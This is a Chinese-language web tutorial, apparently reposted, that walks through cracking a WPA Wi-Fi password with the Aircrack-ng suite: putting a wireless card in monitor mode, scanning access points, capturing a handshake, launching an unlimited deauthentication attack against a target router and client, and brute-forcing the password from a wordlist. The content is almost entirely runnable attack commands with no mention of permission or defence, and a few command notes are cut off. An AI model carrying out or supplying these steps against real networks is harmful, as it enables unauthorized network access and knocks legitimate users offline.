使用Aircrack

2024-07-09 07:57| 来源: 网络整理| 查看: 265

1.查看插入的网卡 iwconfig

2.查看无线网卡 airmon-ng

3.开启网卡监听模式,记录monitor名称,杀掉其他使用WiFi进程 airmon-ng start wlan0

4.扫描信号 airodump-ng wlan0mon

BSSID是AP端的MAC地址 PWR是信号强度，数字越小越好 Data是对应的路由器的在线数据吞吐量，数字越大，数据上传量越大。 CH是对应路由器的所在频道 ESSID是对应路由器的名称 5.停止扫描抓取合适目标

CTRL + C

6.监听目标频道查看链接该ap的客户端准备抓包

airodump-ng -c 6 -w Desktop/handshake --bssid C0:00:00:00:00:48 wlan0mon

注: airodump-ng -c -w --bssid

7.保持上一个terminal窗口的运行状态，打开一个新的terminal,进行解除认证攻击 aireplay-ng -0 0 -a C0:00:00:00:00:48 -c 18:00:00:00:00:88 wlan0mon

注：aireplay-ng - [攻击次数，0为无限攻击] -a -c 注：当你获取道握手包时，红色区域会显示”WPA handshake”。

8. 关闭监听模式。 airmon-ng stop wlan0mon 9.使用字典进行暴力破解。 aircrack-ng -w Desktop/wordlist.txt Desktop/handshake-01.cap

注：`aircrack-ng -w

10.破解速度取决你CPU的核心数和频率,当密码破解成功时，会在如图区域位置显示”KEY FOUND!”字样，中括号为AP端的密码 11.实测10万条密码需要十秒左右基本每秒一万条,速度还是很快的

【本文地址】

今日新闻